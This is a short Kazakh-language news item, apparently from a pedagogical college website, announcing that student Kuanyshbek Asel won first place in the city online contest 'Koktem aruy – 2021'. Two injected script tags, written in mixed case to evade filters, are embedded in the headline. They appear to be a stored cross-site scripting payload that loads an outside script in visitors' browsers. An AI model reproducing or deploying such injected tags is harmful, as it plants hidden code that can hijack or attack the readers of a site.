«КӨКТЕМ АРУЫ – 2021» қалалық байқауының жеңімпазы атанды!<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
24.03.2021
Қазақстан Республикасының Тәуелсіздігінің 30 жылдығы мен «Наурыз шуағы» мейрамын тойлауына орай ұйымдастырылған «Көктем аруы – 2021» қыздар арасындағы онлайн шығармашылық байқауында Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінің студенті Қуанышбек Әсел жүлделі І орын иегері атанды. Колледжішілік байқаудан оза шыққан үміткер қалалық байқауда өз өнерін ортаға салып, «Таныс болайық», «Менің өнерім», «Мен – фотомодельмін» кезеңдеріндегі өнері әділқазы алқасы тарапынан жоғары бағаланып, үздіктер қатарынан көріне білді. Ару қызымыз Қуанышбек Әселді жеңісімен құттықтаймыз!
Просмотров: 502